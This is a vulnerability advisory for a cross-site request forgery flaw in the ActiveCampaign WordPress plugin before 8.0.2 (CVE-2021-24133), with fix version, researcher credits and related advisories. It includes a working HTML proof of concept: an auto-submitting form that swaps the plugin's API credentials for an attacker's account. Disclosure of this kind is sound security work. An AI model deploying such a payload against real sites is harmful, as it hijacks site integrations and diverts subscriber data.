ActiveCampaign < 8.0.2 – Cross-Site Request Forgery in Settings | CVE 2021-24133 | Plugin Vulnerabilities

Description

The ActiveCampaign 8.0.1 plugin is lacking CSRF check on its Settings form, which could allow attacker to make a logged-in administrator change API Credentials to attacker's account.

Proof of Concept

When a logged-in administrator accesses an HTML page embedded below content, the plugin's setting will be changed.

<html>
  <body>
    <form action="http://example.com/wp-admin/options-general.php?page=activecampaign" method="POST">
      <input type="hidden" name="api&#95;url" value="https&#58;&#47;&#47;yopmail59247&#46;api&#45;us1&#46;com" />
      <input type="hidden" name="api&#95;key" value="1eddfe8b3ac848b2154b0f6a1a345730ecef457745c2b70463e0a4838fd30d681ec20369" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Plugins

activecampaign-subscription-forms

Fixed in 8.0.2

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2375366

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)

Submitter

Nguyen Anh Tien

Submitter website

https://research.sun-asterisk.com/

Submitter twitter

Verified

Yes

WPVDB ID

a72a5be4-654b-496f-94cd-3814c0e40120

Timeline

Publicly Published

2020-09-06 (about 5 years ago)

Added

2020-09-06 (about 5 years ago)

Last Updated

2021-01-22 (about 4 years ago)

Other

Published

Title

Published

2025-05-07

Title

LiveAgent < 4.4.8 - Cross-Site Request Forgery

Published

2023-08-11

Title

WooCommerce PDF Invoice Builder < 1.2.91 - Invoice Update via CSRF

Published

2023-10-03

Title

Short URL <= 1.6.8 - CSRF

Published

2015-05-05

Title

WP Ultimate CSV Importer < 3.7.3 - Various CSRF

Published

2022-06-20

Title

Admin Management Xtended < 2.4.5 - Post Visibility/Date/Comment Status Update via CSRF